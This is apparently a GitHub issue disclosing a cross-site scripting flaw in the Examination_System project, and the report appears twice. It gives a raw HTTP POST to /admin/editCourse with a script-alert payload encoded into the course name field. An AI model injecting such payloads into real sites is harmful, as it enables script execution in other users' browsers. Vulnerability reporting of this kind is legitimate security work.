Open afeng2016-s opened 2 years ago
[Suggested description] Cross SIte Scripting (XSS) vulnerability exists in Examination_System.As of March 14, 2022, there was a cross site scripting vulnerability in the master branch.
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] https://github.com/JaceyRx/Examination_System
[Affected Product Code Base] v1.0
[Affected Component]
POST /admin/editCourse HTTP/1.1 Host: localhost:7000 Content-Length: 265 Cache-Control: max-age=0 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost:7000/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:7000/admin/editCourse?id=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=D01E67ABDC192BABF6A2179D70244246 Connection: close
courseid=1&coursename=C%E8%AF%AD%E8%A8%80%E7%A8%8B%E5%BA%8F%E8%AE%BE%E8%AE%A1%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&teacherid=1001&coursetime=%E5%91%A8%E4%BA%8C&classroom=%E7%A7%91401&courseweek=18&coursetype=%E5%BF%85%E4%BF%AE%E8%AF%BE&collegeid=1&score=3
[Attack Type] Remote
[Impact Code execution] true
[Vulnerability proof]
[Suggested description] Cross SIte Scripting (XSS) vulnerability exists in Examination_System.As of March 14, 2022, there was a cross site scripting vulnerability in the master branch.
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] https://github.com/JaceyRx/Examination_System
[Affected Product Code Base] v1.0
[Affected Component]
POST /admin/editCourse HTTP/1.1 Host: localhost:7000 Content-Length: 265 Cache-Control: max-age=0 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost:7000/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:7000/admin/editCourse?id=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=D01E67ABDC192BABF6A2179D70244246 Connection: close
courseid=1&coursename=C%E8%AF%AD%E8%A8%80%E7%A8%8B%E5%BA%8F%E8%AE%BE%E8%AE%A1%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&teacherid=1001&coursetime=%E5%91%A8%E4%BA%8C&classroom=%E7%A7%91401&courseweek=18&coursetype=%E5%BF%85%E4%BF%AE%E8%AF%BE&collegeid=1&score=3
[Attack Type] Remote
[Impact Code execution] true
[Vulnerability proof]